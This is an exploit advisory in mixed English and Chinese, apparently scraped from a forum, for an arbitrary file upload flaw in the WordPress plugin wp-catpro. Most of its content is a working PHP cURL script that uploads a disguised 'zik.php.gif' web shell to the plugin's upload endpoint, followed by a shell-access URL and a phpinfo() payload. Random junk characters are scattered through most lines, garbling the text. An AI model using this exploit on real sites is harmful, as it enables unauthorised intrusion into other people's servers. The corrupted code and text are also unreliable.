Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability6 r/ u* M/ U1 F- y$ B
#-----------------------------------------------------------------------
8 f7 r$ E1 u: n% Q
$ ?# h. ]& r7 N* x f' j' H- \: O作者 => Zikou-16
* I/ I M( a) a7 V9 r C邮箱 => zikou16x@gmail.com( T# R. F3 u& @9 m7 S: H
测试系统 : Windows 7 , Backtrack 5r3
! G+ u6 f4 _( T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip8 D) k; s9 ]" Z* x- G
####
+ j- p2 v0 C/ L
& \$ O. n- b/ k# h#=> Exploit 信息:
$ ^) `, ^' F+ ]$ T+ t------------------
6 ^/ Q2 X0 j0 |9 Q9 E* t# 攻击者可以上传 file/shell.php.gif
2 @- o1 Q) V: I: }6 d, F* b# ("jpg", "gif", "png") // Allowed file extensions
9 n6 Z1 W, X% |" d5 f9 D1 ?# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)5 f! @4 ?$ W: y' c# b( N: a0 k
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
1 G+ N8 R# q' }1 t t. M------------------; O' r* n3 d5 w4 M
7 s2 ^: N: A* N#=> Exploit. a/ o' q7 C! U6 S- v; X
-----------
- q5 ~0 U8 ^/ o; |<?php
" I; l1 l2 v! s. b0 Z0 ~. \
, a" Y) _5 d/ {6 f6 ?+ }$uploadfile="zik.php.gif";
0 l9 ~3 G% m/ x$ M+ r$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");% g& z1 C7 ^) ?+ x8 a
curl_setopt($ch, CURLOPT_POST, true);
+ |( J" x, B+ w8 O# y: acurl_setopt($ch, CURLOPT_POSTFIELDS,
3 ~ b+ R6 s! i: A Farray('Filedata'=>"@$uploadfile",
3 ?5 c0 T! q" N' y! I0 e* `( f'folder'=>'/wp-content/uploads/catpro/'));! h$ ^8 X6 f" ?' I! q2 ~
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
& t9 J0 V0 u7 l& B7 |$postResult = curl_exec($ch);
9 \6 H) F3 \) a) x. p: X) q) P3 vcurl_close($ch);7 r( f( C( i+ d$ p$ m9 R2 x
% L) v% b% P0 z
print "$postResult";8 y7 L0 t7 s- I2 M+ n
- ` M4 V: {8 T8 ~; EShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif3 M1 e; Z1 r% f7 L
?>
$ n6 E6 R0 I `4 L$ ], [1 }<?php
$ M" M' N; `. k+ b/ Y* E/ Cphpinfo();$ B& O8 P0 M" }$ _. A) S; |' f1 a
?> |